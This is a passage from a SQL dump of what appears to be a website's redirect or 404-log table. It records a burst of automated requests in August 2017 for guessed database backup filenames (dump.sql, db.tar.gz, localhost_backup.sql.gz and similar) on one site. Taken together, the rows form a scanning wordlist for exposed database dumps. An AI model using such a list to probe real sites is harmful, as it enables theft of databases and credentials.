00:00:00',301),(11286,'http://ekvatorprint.com.ua/database/www.ekvatorprint.sql',NULL,'','',1,0,'2017-08-16 17:21:47','0000-00-00 00:00:00',301),(11287,'http://ekvatorprint.com.ua/database/www.ekvatorprint.sql.gz',NULL,'','',1,0,'2017-08-16 17:21:47','0000-00-00 00:00:00',301),(11288,'http://ekvatorprint.com.ua/database/ekvatorprint.com.ua.sql',NULL,'','',3,0,'2017-08-16 17:21:47','0000-00-00 00:00:00',301),(11289,'http://ekvatorprint.com.ua/database/ekvatorprint.com.ua.sql.gz',NULL,'','',1,0,'2017-08-16 17:21:47','0000-00-00 00:00:00',301),(11290,'http://ekvatorprint.com.ua/database/ekvatorprint.sql',NULL,'','',3,0,'2017-08-16 17:21:48','0000-00-00 00:00:00',301),(11291,'http://ekvatorprint.com.ua/database/ekvatorprint_backup.sql',NULL,'','',1,0,'2017-08-16 17:21:49','0000-00-00 00:00:00',301),(11292,'http://ekvatorprint.com.ua/database/ekvatorprint_backup.sql.gz',NULL,'','',1,0,'2017-08-16 17:21:49','0000-00-00 00:00:00',301),(11293,'http://ekvatorprint.com.ua/database/ekvatorprint.com.ua_MySQL.sql',NULL,'','',1,0,'2017-08-16 17:21:49','0000-00-00 00:00:00',301),(11294,'http://ekvatorprint.com.ua/database/ekvatorprint_MySQL.sql',NULL,'','',1,0,'2017-08-16 17:21:49','0000-00-00 00:00:00',301),(11295,'http://ekvatorprint.com.ua/database/databases.sql',NULL,'','',1,0,'2017-08-16 17:21:49','0000-00-00 00:00:00',301),(11296,'http://ekvatorprint.com.ua/database/databases.zip',NULL,'','',1,0,'2017-08-16 17:21:49','0000-00-00 00:00:00',301),(11297,'http://ekvatorprint.com.ua/database/databases.tar',NULL,'','',1,0,'2017-08-16 17:21:50','0000-00-00 00:00:00',301),(11298,'http://ekvatorprint.com.ua/database/databases.tar.gz',NULL,'','',1,0,'2017-08-16 17:21:50','0000-00-00 00:00:00',301),(11299,'http://ekvatorprint.com.ua/database/databases.tgz',NULL,'','',1,0,'2017-08-16 17:21:50','0000-00-00 00:00:00',301),(11300,'http://ekvatorprint.com.ua/database/databases.bck',NULL,'','',1,0,'2017-08-16 17:21:51','0000-00-00 00:00:00',301),(11301,'http://ekvatorprint.com.ua/database/db.php~',NULL,'','',1,0,'2017-08-16 17:21:51','0000-00-00 00:00:00',301),(11302,'http://ekvatorprint.com.ua/database/db.bak',NULL,'','',1,0,'2017-08-16 17:21:51','0000-00-00 00:00:00',301),(11303,'http://ekvatorprint.com.ua/database/db.php.bck',NULL,'','',1,0,'2017-08-16 17:21:52','0000-00-00 00:00:00',301),(11304,'http://ekvatorprint.com.ua/database/db.php.bak',NULL,'','',1,0,'2017-08-16 17:21:52','0000-00-00 00:00:00',301),(11305,'http://ekvatorprint.com.ua/database/database.php~',NULL,'','',1,0,'2017-08-16 17:21:52','0000-00-00 00:00:00',301),(11306,'http://ekvatorprint.com.ua/database/database.bak',NULL,'','',1,0,'2017-08-16 17:21:52','0000-00-00 00:00:00',301),(11307,'http://ekvatorprint.com.ua/database/database.php.bak',NULL,'','',1,0,'2017-08-16 17:21:52','0000-00-00 00:00:00',301),(11308,'http://ekvatorprint.com.ua/database/database.php.bck',NULL,'','',1,0,'2017-08-16 17:21:52','0000-00-00 00:00:00',301),(11309,'http://ekvatorprint.com.ua/database/db.gz',NULL,'','',1,0,'2017-08-16 17:21:53','0000-00-00 00:00:00',301),(11310,'http://ekvatorprint.com.ua/database/db.rar',NULL,'','',1,0,'2017-08-16 17:21:53','0000-00-00 00:00:00',301),(11311,'http://ekvatorprint.com.ua/database/db.zip',NULL,'','',1,0,'2017-08-16 17:21:53','0000-00-00 00:00:00',301),(11312,'http://ekvatorprint.com.ua/database/db.bz2',NULL,'','',1,0,'2017-08-16 17:21:53','0000-00-00 00:00:00',301),(11313,'http://ekvatorprint.com.ua/database/db.tgz',NULL,'','',1,0,'2017-08-16 17:21:54','0000-00-00 00:00:00',301),(11314,'http://ekvatorprint.com.ua/database/db.bck',NULL,'','',1,0,'2017-08-16 17:21:54','0000-00-00 00:00:00',301),(11315,'http://ekvatorprint.com.ua/database/database.gz',NULL,'','',1,0,'2017-08-16 17:21:54','0000-00-00 00:00:00',301),(11316,'http://ekvatorprint.com.ua/database/database.bz2',NULL,'','',1,0,'2017-08-16 17:21:55','0000-00-00 00:00:00',301),(11317,'http://ekvatorprint.com.ua/database/database.tgz',NULL,'','',1,0,'2017-08-16 17:21:55','0000-00-00 00:00:00',301),(11318,'http://ekvatorprint.com.ua/database/database.bck',NULL,'','',1,0,'2017-08-16 17:21:55','0000-00-00 00:00:00',301),(11319,'http://ekvatorprint.com.ua/database/db.sql',NULL,'','',1,0,'2017-08-16 17:21:55','0000-00-00 00:00:00',301),(11320,'http://ekvatorprint.com.ua/database/dump.sql',NULL,'','',3,0,'2017-08-16 17:21:55','0000-00-00 00:00:00',301),(11321,'http://ekvatorprint.com.ua/database/dbdump.sql',NULL,'','',1,0,'2017-08-16 17:21:55','0000-00-00 00:00:00',301),(11322,'http://ekvatorprint.com.ua/database/localhost.sql',NULL,'','',3,0,'2017-08-16 17:21:56','0000-00-00 00:00:00',301),(11323,'http://ekvatorprint.com.ua/database/localhostdb.sql',NULL,'','',1,0,'2017-08-16 17:21:57','0000-00-00 00:00:00',301),(11324,'http://ekvatorprint.com.ua/database/localhost_db.sql',NULL,'','',1,0,'2017-08-16 17:21:57','0000-00-00 00:00:00',301),(11325,'http://ekvatorprint.com.ua/database/localhost-db.sql',NULL,'','',1,0,'2017-08-16 17:21:57','0000-00-00 00:00:00',301),(11326,'http://ekvatorprint.com.ua/database/localhost_database.sql',NULL,'','',1,0,'2017-08-16 17:21:58','0000-00-00 00:00:00',301),(11327,'http://ekvatorprint.com.ua/database/localhost-database.sql',NULL,'','',1,0,'2017-08-16 17:21:58','0000-00-00 00:00:00',301),(11328,'http://ekvatorprint.com.ua/database/localhost_dump.sql',NULL,'','',1,0,'2017-08-16 17:21:58','0000-00-00 00:00:00',301),(11329,'http://ekvatorprint.com.ua/database/localhost-dump.sql',NULL,'','',1,0,'2017-08-16 17:21:59','0000-00-00 00:00:00',301),(11330,'http://ekvatorprint.com.ua/database/localhostbackup.sql',NULL,'','',1,0,'2017-08-16 17:21:59','0000-00-00 00:00:00',301),(11331,'http://ekvatorprint.com.ua/database/localhost_backup.sql',NULL,'','',1,0,'2017-08-16 17:21:59','0000-00-00 00:00:00',301),(11332,'http://ekvatorprint.com.ua/database/localhost-backup.sql',NULL,'','',1,0,'2017-08-16 17:22:00','0000-00-00 00:00:00',301),(11333,'http://ekvatorprint.com.ua/database/backuplocalhost.sql',NULL,'','',1,0,'2017-08-16 17:22:00','0000-00-00 00:00:00',301),(11334,'http://ekvatorprint.com.ua/database/backup-localhost.sql',NULL,'','',1,0,'2017-08-16 17:22:00','0000-00-00 00:00:00',301),(11335,'http://ekvatorprint.com.ua/database/backup_localhost.sql',NULL,'','',1,0,'2017-08-16 17:22:00','0000-00-00 00:00:00',301),(11336,'http://ekvatorprint.com.ua/database/ekvatorprintdb.sql',NULL,'','',1,0,'2017-08-16 17:22:00','0000-00-00 00:00:00',301),(11337,'http://ekvatorprint.com.ua/database/ekvatorprint_db.sql',NULL,'','',1,0,'2017-08-16 17:22:00','0000-00-00 00:00:00',301),(11338,'http://ekvatorprint.com.ua/database/ekvatorprint-db.sql',NULL,'','',1,0,'2017-08-16 17:22:01','0000-00-00 00:00:00',301),(11339,'http://ekvatorprint.com.ua/database/ekvatorprint_database.sql',NULL,'','',1,0,'2017-08-16 17:22:01','0000-00-00 00:00:00',301),(11340,'http://ekvatorprint.com.ua/database/ekvatorprint-database.sql',NULL,'','',1,0,'2017-08-16 17:22:01','0000-00-00 00:00:00',301),(11341,'http://ekvatorprint.com.ua/database/ekvatorprint_dump.sql',NULL,'','',1,0,'2017-08-16 17:22:01','0000-00-00 00:00:00',301),(11342,'http://ekvatorprint.com.ua/database/ekvatorprint-dump.sql',NULL,'','',1,0,'2017-08-16 17:22:01','0000-00-00 00:00:00',301),(11343,'http://ekvatorprint.com.ua/database/ekvatorprintbackup.sql',NULL,'','',1,0,'2017-08-16 17:22:02','0000-00-00 00:00:00',301),(11344,'http://ekvatorprint.com.ua/database/ekvatorprint-backup.sql',NULL,'','',1,0,'2017-08-16 17:22:02','0000-00-00 00:00:00',301),(11345,'http://ekvatorprint.com.ua/database/backupekvatorprint.sql',NULL,'','',1,0,'2017-08-16 17:22:02','0000-00-00 00:00:00',301),(11346,'http://ekvatorprint.com.ua/database/backup-ekvatorprint.sql',NULL,'','',1,0,'2017-08-16 17:22:03','0000-00-00 00:00:00',301),(11347,'http://ekvatorprint.com.ua/database/backup_ekvatorprint.sql',NULL,'','',1,0,'2017-08-16 17:22:03','0000-00-00 00:00:00',301),(11348,'http://ekvatorprint.com.ua/database/ekvatorprint.com.uadb.sql',NULL,'','',1,0,'2017-08-16 17:22:03','0000-00-00 00:00:00',301),(11349,'http://ekvatorprint.com.ua/database/ekvatorprint.com.ua_db.sql',NULL,'','',1,0,'2017-08-16 17:22:03','0000-00-00 00:00:00',301),(11350,'http://ekvatorprint.com.ua/database/ekvatorprint.com.ua-db.sql',NULL,'','',1,0,'2017-08-16 17:22:03','0000-00-00 00:00:00',301),(11351,'http://ekvatorprint.com.ua/database/ekvatorprint.com.ua_database.sql',NULL,'','',1,0,'2017-08-16 17:22:03','0000-00-00 00:00:00',301),(11352,'http://ekvatorprint.com.ua/database/ekvatorprint.com.ua-database.sql',NULL,'','',1,0,'2017-08-16 17:22:04','0000-00-00 00:00:00',301),(11353,'http://ekvatorprint.com.ua/database/ekvatorprint.com.ua_dump.sql',NULL,'','',1,0,'2017-08-16 17:22:04','0000-00-00 00:00:00',301),(11354,'http://ekvatorprint.com.ua/database/ekvatorprint.com.ua-dump.sql',NULL,'','',1,0,'2017-08-16 17:22:04','0000-00-00 00:00:00',301),(11355,'http://ekvatorprint.com.ua/database/ekvatorprint.com.uabackup.sql',NULL,'','',1,0,'2017-08-16 17:22:04','0000-00-00 00:00:00',301),(11356,'http://ekvatorprint.com.ua/database/ekvatorprint.com.ua_backup.sql',NULL,'','',1,0,'2017-08-16 17:22:04','0000-00-00 00:00:00',301),(11357,'http://ekvatorprint.com.ua/database/ekvatorprint.com.ua-backup.sql',NULL,'','',1,0,'2017-08-16 17:22:04','0000-00-00 00:00:00',301),(11358,'http://ekvatorprint.com.ua/database/backupekvatorprint.com.ua.sql',NULL,'','',1,0,'2017-08-16 17:22:05','0000-00-00 00:00:00',301),(11359,'http://ekvatorprint.com.ua/database/backup-ekvatorprint.com.ua.sql',NULL,'','',1,0,'2017-08-16 17:22:05','0000-00-00 00:00:00',301),(11360,'http://ekvatorprint.com.ua/database/backup_ekvatorprint.com.ua.sql',NULL,'','',1,0,'2017-08-16 17:22:05','0000-00-00 00:00:00',301),(11361,'http://ekvatorprint.com.ua/database/db.sql.gz',NULL,'','',1,0,'2017-08-16 17:22:05','0000-00-00 00:00:00',301),(11362,'http://ekvatorprint.com.ua/database/dbdump.sql.gz',NULL,'','',1,0,'2017-08-16 17:22:06','0000-00-00 00:00:00',301),(11363,'http://ekvatorprint.com.ua/database/database.sql.gz',NULL,'','',1,0,'2017-08-16 17:22:06','0000-00-00 00:00:00',301),(11364,'http://ekvatorprint.com.ua/database/backup.sql.gz',NULL,'','',1,0,'2017-08-16 17:22:06','0000-00-00 00:00:00',301),(11365,'http://ekvatorprint.com.ua/database/localhost.sql.gz',NULL,'','',1,0,'2017-08-16 17:22:07','0000-00-00 00:00:00',301),(11366,'http://ekvatorprint.com.ua/database/localhostdb.sql.gz',NULL,'','',1,0,'2017-08-16 17:22:07','0000-00-00 00:00:00',301),(11367,'http://ekvatorprint.com.ua/database/localhost_db.sql.gz',NULL,'','',1,0,'2017-08-16 17:22:07','0000-00-00 00:00:00',301),(11368,'http://ekvatorprint.com.ua/database/localhost-db.sql.gz',NULL,'','',1,0,'2017-08-16 17:22:07','0000-00-00 00:00:00',301),(11369,'http://ekvatorprint.com.ua/database/localhost_database.sql.gz',NULL,'','',1,0,'2017-08-16 17:22:07','0000-00-00 00:00:00',301),(11370,'http://ekvatorprint.com.ua/database/localhost-database.sql.gz',NULL,'','',1,0,'2017-08-16 17:22:08','0000-00-00 00:00:00',301),(11371,'http://ekvatorprint.com.ua/database/localhost_dump.sql.gz',NULL,'','',1,0,'2017-08-16 17:22:08','0000-00-00 00:00:00',301),(11372,'http://ekvatorprint.com.ua/database/localhost-dump.sql.gz',NULL,'','',1,0,'2017-08-16 17:22:09','0000-00-00 00:00:00',301),(11373,'http://ekvatorprint.com.ua/database/localhostbackup.sql.gz',NULL,'','',1,0,'2017-08-16 17:22:09','0000-00-00 00:00:00',301),(11374,'http://ekvatorprint.com.ua/database/localhost_backup.sql.gz',NULL,'','',1,0,'2017-08-16 17:22:09','0000-00-00 00:00:00',301),(11375,'http://ekvatorprint.com.ua/database/localhost-backup.sql.gz',NULL,'','',1,0,'2017-08-16 17:22:10','0000-00-00 00:00:00',301),(11376,'http://ekvatorprint.com.ua/database/backuplocalhost.sql.gz',NULL,'','',1,0,'2017-08-16 17:22:10','0000-00-00 00:00:00',301),(11377,'http://ekvatorprint.com.ua/database/backup-localhost.sql.gz',NULL,'','',1,0,'2017-08-16 17:22:10','0000-00-00 00:00:00',301),(11378,'http://ekvatorprint.com.ua/database/backup_localhost.sql.gz',NULL,'','',1,0,'2017-08-16 17:22:11','0000-00-00 00:00:00',301),(11379,'http://ekvatorprint.com.ua/database/ekvatorprint.com.uadb.sql.gz',NULL,'','',1,0,'2017-08-16 17:22:11','0000-00-00 00:00:00',301),(11380,'http://ekvatorprint.com.ua/database/ekvatorprint.com.ua_db.sql.gz',NULL,'','',1,0,'2017-08-16 17:22:11','0000-00-00 00:00:00',301),(11381,'http://ekvatorprint.com.ua/database/ekvatorprint.com.ua-db.sql.gz',NULL,'','',1,0,'2017-08-16 17:22:11','0000-00-00 00:00:00',301),(11382,'http://ekvatorprint.com.ua/database/ekvatorprint.com.ua_database.sql.gz',NULL,'','',1,0,'2017-08-16 17:22:11','0000-00-00 00:00:00',301),(11383,'http://ekvatorprint.com.ua/database/ekvatorprint.com.ua-database.sql.gz',NULL,'','',1,0,'2017-08-16 17:22:11','0000-00-00 00:00:00',301),(11384,'http://ekvatorprint.com.ua/database/ekvatorprint.com.ua_dump.sql.gz',NULL,'','',1,0,'2017-08-16 17:22:12','0000-00-00 00:00:00',301),(11385,'http://ekvatorprint.com.ua/database/ekvatorprint.com.ua-dump.sql.gz',NULL,'','',1,0,'2017-08-16 17:22:12','0000-00-00 00:00:00',301),(11386,'http://ekvatorprint.com.ua/database/ekvatorprint.com.uabackup.sql.gz',NULL,'','',1,0,'2017-08-16 17:22:12','0000-00-00 00:00:00',301),(11387,'http://ekvatorprint.com.ua/database/ekvatorprint.com.ua_backup.sql.gz',NULL,'','',1,0,'2017-08-16 17:22:12','0000-00-00 00:00:00',301),(11388,'http://ekvatorprint.com.ua/database/ekvatorprint.com.ua-backup.sql.gz',NULL,'','',1,0,'2017-08-16 17:22:12','0000-00-00 00:00:00',301),(11389,'http://ekvatorprint.com.ua/database/backupekvatorprint.com.ua.sql.gz',NULL,'','',1,0,'2017-08-16 17:22:12','0000-00-00 00:00:00',301),(11390,'http://ekvatorprint.com.ua/database/backup-ekvatorprint.com.ua.sql.gz',NULL,'','',1,0,'2017-08-16 17:22:12','0000-00-00 00:00:00',301),(11391,'http://ekvatorprint.com.ua/database/backup_ekvatorprint.com.ua.sql.gz',NULL,'','',1,0,'2017-08-16 17:22:13','0000-00-00 00:00:00',301),(11392,'http://ekvatorprint.com.ua/database/ekvatorprint.sql.gz',NULL,'','',1,0,'2017-08-16 17:22:13','0000-00-00 00:00:00',301),(11393,'http://ekvatorprint.com.ua/database/ekvatorprintdb.sql.gz',NULL,'','',1,0,'2017-08-16 17:22:13','0000-00-00 00:00:00',301),(11394,'http://ekvatorprint.com.ua/database/ekvatorprint_db.sql.gz',NULL,'','',1,0,'2017-08-16 17:22:13','0000-00-00 00:00:00',301),(11395,'http://ekvatorprint.com.ua/database/ekvatorprint-db.sql.gz',NULL,'','',1,0,'2017-08-16 17:22:13','0000-00-00 00:00:00',301),(11396,'http://ekvatorprint.com.ua/database/ekvatorprint_database.sql.gz',NULL,'','',1,0,'2017-08-16 17:22:13','0000-00-00 00:00:00',301),(11397,'http://ekvatorprint.com.ua/database/ekvatorprint-database.sql.gz',NULL,'','',1,0,'2017-08-16 17:22:14','0000-00-00 00:00:00',301),(11398,'http://ekvatorprint.com.ua/database/ekvatorprint_dump.sql.gz',NULL,'','',1,0,'2017-08-16 17:22:14','0000-00-00 00:00:00',301),(11399,'http://ekvatorprint.com.ua/database/ekvatorprint-dump.sql.gz',NULL,'','',1,0,'2017-08-16 17:22:14','0000-00-00 00:00:00',301),(11400,'http://ekvatorprint.com.ua/database/ekvatorprintbackup.sql.gz',NULL,'','',1,0,'2017-08-16 17:22:14','0000-00-00 00:00:00',301),(11401,'http://ekvatorprint.com.ua/database/ekvatorprint-backup.sql.gz',NULL,'','',1,0,'2017-08-16 17:22:14','0000-00-00 00:00:00',301),(11402,'http://ekvatorprint.com.ua/database/backupekvatorprint.sql.gz',NULL,'','',1,0,'2017-08-16 17:22:14','0000-00-00 00:00:00',301),(11403,'http://ekvatorprint.com.ua/database/backup-ekvatorprint.sql.gz',NULL,'','',1,0,'2017-08-16 17:22:15','0000-00-00 00:00:00',301),(11404,'http://ekvatorprint.com.ua/database/backup_ekvatorprint.sql.gz',NULL,'','',1,0,'2017-08-16 17:22:15','0000-00-00 00:00:00',301),(11405,'http://ekvatorprint.com.ua/database/db.sql.tar',NULL,'','',1,0,'2017-08-16 17:22:15','0000-00-00 00:00:00',301),(11406,'http://ekvatorprint.com.ua/database/dump.sql.tar',NULL,'','',1,0,'2017-08-16 17:22:15','0000-00-00 00:00:00',301),(11407,'http://ekvatorprint.com.ua/database/dbdump.sql.tar',NULL,'','',1,0,'2017-08-16 17:22:16','0000-00-00 00:00:00',301),(11408,'http://ekvatorprint.com.ua/database/database.sql.tar',NULL,'','',1,0,'2017-08-16 17:22:16','0000-00-00 00:00:00',301),(11409,'http://ekvatorprint.com.ua/database/backup.sql.tar',NULL,'','',1,0,'2017-08-16 17:22:16','0000-00-00 00:00:00',301),(11410,'http://ekvatorprint.com.ua/database/localhost.sql.tar',NULL,'','',1,0,'2017-08-16 17:22:17','0000-00-00 00:00:00',301),(11411,'http://ekvatorprint.com.ua/database/localhostdb.sql.tar',NULL,'','',1,0,'2017-08-16 17:22:17','0000-00-00 00:00:00',301),(11412,'http://ekvatorprint.com.ua/database/localhost_db.sql.tar',NULL,'','',1,0,'2017-08-16 17:22:17','0000-00-00 00:00:00',301),(11413,'http://ekvatorprint.com.ua/database/localhost-db.sql.tar',NULL,'','',1,0,'2017-08-16 17:22:17','0000-00-00 00:00:00',301),(11414,'http://ekvatorprint.com.ua/database/localhost_database.sql.tar',NULL,'','',1,0,'2017-08-16 17:22:18','0000-00-00 00:00:00',301),(11415,'http://ekvatorprint.com.ua/database/localhost-database.sql.tar',NULL,'','',1,0,'2017-08-16 17:22:18','0000-00-00 00:00:00',301),(11416,'http://ekvatorprint.com.ua/database/localhost_dump.sql.tar',NULL,'','',1,0,'2017-08-16 17:22:18','0000-00-00 00:00:00',301),(11417,'http://ekvatorprint.com.ua/database/localhost-dump.sql.tar',NULL,'','',1,0,'2017-08-16 17:22:18','0000-00-00 00:00:00',301),(11418,'http://ekvatorprint.com.ua/database/localhostbackup.sql.tar',NULL,'','',1,0,'2017-08-16 17:22:18','0000-00-00 00:00:00',301),(11419,'http://ekvatorprint.com.ua/database/localhost_backup.sql.tar',NULL,'','',1,0,'2017-08-16 17:22:19','0000-00-00 00:00:00',301),(11420,'http://ekvatorprint.com.ua/database/localhost-backup.sql.tar',NULL,'','',1,0,'2017-08-16 17:22:19','0000-00-00 00:00:00',301),(11421,'http://ekvatorprint.com.ua/database/backuplocalhost.sql.tar',NULL,'','',1,0,'2017-08-16 17:22:19','0000-00-00 00:00:00',301),(11422,'http://ekvatorprint.com.ua/database/backup-localhost.sql.tar',NULL,'','',1,0,'2017-08-16 17:22:19','0000-00-00 00:00:00',301),(11423,'http://ekvatorprint.com.ua/database/backup_localhost.sql.tar',NULL,'','',1,0,'2017-08-16 17:22:19','0000-00-00 00:00:00',301),(11424,'http://ekvatorprint.com.ua/database/ekvatorprint.sql.tar',NULL,'','',1,0,'2017-08-16 17:22:19','0000-00-00 00:00:00',301),(11425,'http://ekvatorprint.com.ua/database/ekvatorprintdb.sql.tar',NULL,'','',1,0,'2017-08-16 17:22:20','0000-00-00 00:00:00',301),(11426,'http://ekvatorprint.com.ua/database/ekvatorprint_db.sql.tar',NULL,'','',1,0,'2017-08-16 17:22:20','0000-00-00 00:00:00',301),(11427,'http://ekvatorprint.com.ua/database/ekvatorprint-db.sql.tar',NULL,'','',1,0,'2017-08-16 17:22:20','0000-00-00 00:00:00',301),(11428,'http://ekvatorprint.com.ua/database/ekvatorprint_database.sql.tar',NULL,'','',1,0,'2017-08-16 17:22:20','0000-00-00 00:00:00',301),(11429,'http://ekvatorprint.com.ua/database/ekvatorprint-database.sql.tar',NULL,'','',1,0,'2017-08-16 17:22:21','0000-00-00 00:00:00',301),(11430,'http://ekvatorprint.com.ua/database/ekvatorprint_dump.sql.tar',NULL,'','',1,0,'2017-08-16 17:22:21','0000-00-00 00:00:00',301),(11431,'http://ekvatorprint.com.ua/database/ekvatorprint-dump.sql.tar',NULL,'','',1,0,'2017-08-16 17:22:21','0000-00-00 00:00:00',301),(11432,'http://ekvatorprint.com.ua/database/ekvatorprintbackup.sql.tar',NULL,'','',1,0,'2017-08-16 17:22:21','0000-00-00 00:00:00',301),(11433,'http://ekvatorprint.com.ua/database/ekvatorprint_backup.sql.tar',NULL,'','',1,0,'2017-08-16 17:22:21','0000-00-00 00:00:00',301),(11434,'http://ekvatorprint.com.ua/database/ekvatorprint-backup.sql.tar',NULL,'','',1,0,'2017-08-16 17:22:21','0000-00-00 00:00:00',301),(11435,'http://ekvatorprint.com.ua/database/backupekvatorprint.sql.tar',NULL,'','',1,0,'2017-08-16 17:22:22','0000-00-00 00:00:00',301),(11436,'http://ekvatorprint.com.ua/database/backup-ekvatorprint.sql.tar',NULL,'','',1,0,'2017-08-16 17:22:22','0000-00-00 00:00:00',301),(11437,'http://ekvatorprint.com.ua/database/backup_ekvatorprint.sql.tar',NULL,'','',1,0,'2017-08-16 17:22:22','0000-00-00 00:00:00',301),(11438,'http://ekvatorprint.com.ua/database/ekvatorprint.com.ua.sql.tar',NULL,'','',1,0,'2017-08-16 17:22:22','0000-00-00 00:00:00',301),(11439,'http://ekvatorprint.com.ua/database/ekvatorprint.com.uadb.sql.tar',NULL,'','',1,0,'2017-08-16 17:22:22','0000-00-00 00:00:00',301),(11440,'http://ekvatorprint.com.ua/database/ekvatorprint.com.ua_db.sql.tar',NULL,'','',1,0,'2017-08-16 17:22:23','0000-00-00 00:00:00',301),(11441,'http://ekvatorprint.com.ua/database/ekvatorprint.com.ua-db.sql.tar',NULL,'','',1,0,'2017-08-16 17:22:24','0000-00-00 00:00:00',301),(11442,'http://ekvatorprint.com.ua/database/ekvatorprint.com.ua_database.sql.tar',NULL,'','',1,0,'2017-08-16 17:22:24','0000-00-00 00:00:00',301),(11443,'http://ekvatorprint.com.ua/database/ekvatorprint.com.ua-database.sql.tar',NULL,'','',1,0,'2017-08-16 17:22:24','0000-00-00 00:00:00',301),(11444,'http://ekvatorprint.com.ua/database/ekvatorprint.com.ua_dump.sql.tar',NULL,'','',1,0,'2017-08-16 17:22:24','0000-00-00 00:00:00',301),(11445,'http://ekvatorprint.com.ua/database/ekvatorprint.com.ua-dump.sql.tar',NULL,'','',1,0,'2017-08-16 17:22:25','0000-00-00 00:00:00',301),(11446,'http://ekvatorprint.com.ua/database/ekvatorprint.com.uabackup.sql.tar',NULL,'','',1,0,'2017-08-16 17:22:25','0000-00-00 00:00:00',301),(11447,'http://ekvatorprint.com.ua/database/ekvatorprint.com.ua_backup.sql.tar',NULL,'','',1,0,'2017-08-16 17:22:25','0000-00-00 00:00:00',301),(11448,'http://ekvatorprint.com.ua/database/ekvatorprint.com.ua-backup.sql.tar',NULL,'','',1,0,'2017-08-16 17:22:26','0000-00-00 00:00:00',301),(11449,'http://ekvatorprint.com.ua/database/backupekvatorprint.com.ua.sql.tar',NULL,'','',1,0,'2017-08-16 17:22:26','0000-00-00 00:00:00',301),(11450,'http://ekvatorprint.com.ua/database/backup-ekvatorprint.com.ua.sql.tar',NULL,'','',1,0,'2017-08-16 17:22:26','0000-00-00 00:00:00',301),(11451,'http://ekvatorprint.com.ua/database/backup_ekvatorprint.com.ua.sql.tar',NULL,'','',1,0,'2017-08-16 17:22:26','0000-00-00 00:00:00',301),(11452,'http://ekvatorprint.com.ua/database/dbdump.zip',NULL,'','',1,0,'2017-08-16 17:22:27','0000-00-00 00:00:00',301),(11453,'http://ekvatorprint.com.ua/database/database.zip',NULL,'','',1,0,'2017-08-16 17:22:27','0000-00-00 00:00:00',301),(11454,'http://ekvatorprint.com.ua/database/localhostdb.zip',NULL,'','',1,0,'2017-08-16 17:22:27','0000-00-00 00:00:00',301),(11455,'http://ekvatorprint.com.ua/database/localhost_db.zip',NULL,'','',1,0,'2017-08-16 17:22:28','0000-00-00 00:00:00',301),(11456,'http://ekvatorprint.com.ua/database/localhost-db.zip',NULL,'','',1,0,'2017-08-16 17:22:28','0000-00-00 00:00:00',301),(11457,'http://ekvatorprint.com.ua/database/localhost_database.zip',NULL,'','',1,0,'2017-08-16 17:22:29','0000-00-00 00:00:00',301),(11458,'http://ekvatorprint.com.ua/database/localhost-database.zip',NULL,'','',1,0,'2017-08-16 17:22:29','0000-00-00 00:00:00',301),(11459,'http://ekvatorprint.com.ua/database/ekvatorprint.com.uadb.zip',NULL,'','',1,0,'2017-08-16 17:22:29','0000-00-00 00:00:00',301),(11460,'http://ekvatorprint.com.ua/database/ekvatorprint.com.ua_db.zip',NULL,'','',1,0,'2017-08-16 17:22:29','0000-00-00 00:00:00',301),(11461,'http://ekvatorprint.com.ua/database/ekvatorprint.com.ua-db.zip',NULL,'','',1,0,'2017-08-16 17:22:29','0000-00-00 00:00:00',301),(11462,'http://ekvatorprint.com.ua/database/ekvatorprint.com.ua_database.zip',NULL,'','',1,0,'2017-08-16 17:22:30','0000-00-00 00:00:00',301),(11463,'http://ekvatorprint.com.ua/database/ekvatorprint.com.ua-database.zip',NULL,'','',1,0,'2017-08-16 17:22:30','0000-00-00 00:00:00',301),(11464,'http://ekvatorprint.com.ua/database/ekvatorprintdb.zip',NULL,'','',1,0,'2017-08-16 17:22:30','0000-00-00 00:00:00',301),(11465,'http://ekvatorprint.com.ua/database/ekvatorprint_db.zip',NULL,'','',1,0,'2017-08-16 17:22:30','0000-00-00 00:00:00',301),(11466,'http://ekvatorprint.com.ua/database/ekvatorprint-db.zip',NULL,'','',1,0,'2017-08-16 17:22:30','0000-00-00 00:00:00',301),(11467,'http://ekvatorprint.com.ua/database/ekvatorprint_database.zip',NULL,'','',1,0,'2017-08-16 17:22:31','0000-00-00 00:00:00',301),(11468,'http://ekvatorprint.com.ua/database/ekvatorprint-database.zip',NULL,'','',1,0,'2017-08-16 17:22:31','0000-00-00 00:00:00',301),(11469,'http://ekvatorprint.com.ua/database/db.tar.gz',NULL,'','',1,0,'2017-08-16 17:22:31','0000-00-00 00:00:00',301),(11470,'http://ekvatorprint.com.ua/database/dbdump.tar.gz',NULL,'','',1,0,'2017-08-16 17:22:31','0000-00-00 00:00:00',301),(11471,'http://ekvatorprint.com.ua/database/database.tar.gz',NULL,'','',1,0,'2017-08-16 17:22:31','0000-00-00 00:00:00',301),(11472,'http://ekvatorprint.com.ua/database/localhostdb.tar.gz',NULL,'','',1,0,'2017-08-16 17:22:32','0000-00-00 00:00:00',301),(11473,'http://ekvatorprint.com.ua/database/localhost_db.tar.gz',NULL,'','',1,0,'2017-08-16 17:22:32','0000-00-00 00:00:00',301),(11474,'http://ekvatorprint.com.ua/database/localhost-db.tar.gz',NULL,'','',1,0,'2017-08-16 17:22:32','0000-00-00 00:00:00',301),(11475,'http://ekvatorprint.com.ua/database/localhost_database.tar.gz',NULL,'','',1,0,'2017-08-16 17:22:32','0000-00-00 00:00:00',301),(11476,'http://ekvatorprint.com.ua/database/localhost-database.tar.gz',NULL,'','',1,0,'2017-08-16 17:22:32','0000-00-00 00:00:00',301),(11477,'http://ekvatorprint.com.ua/database/ekvatorprintdb.tar.gz',NULL,'','',1,0,'2017-08-16 17:22:32','0000-00-00 00:00:00',301),(11478,'http://ekvatorprint.com.ua/database/ekvatorprint_db.tar.gz',NULL,'','',1,0,'2017-08-16 17:22:33','0000-00-00 00:00:00',301),(11479,'http://ekvatorprint.com.ua/database/ekvatorprint-db.tar.gz',NULL,'','',1,0,'2017-08-16 17:22:33','0000-00-00 00:00:00',301),(11480,'http://ekvatorprint.com.ua/database/ekvatorprint_database.tar.gz',NULL,'','',1,0,'2017-08-16 17:22:33','0000-00-00 00:00:00',301),(11481,'http://ekvatorprint.com.ua/database/ekvatorprint-database.tar.gz',NULL,'','',1,0,'2017-08-16 17:22:34','0000-00-00 00:00:00',301),(11482,'http://ekvatorprint.com.ua/database/ekvatorprint.com.uadb.tar.gz',NULL,'','',1,0,'2017-08-16 17:22:34','0000-00-00 00:00:00',301),(11483,'http://ekvatorprint.com.ua/database/ekvatorprint.com.ua_db.tar.gz',NULL,'','',1,0,'2017-08-16 17:22:34','0000-00-00 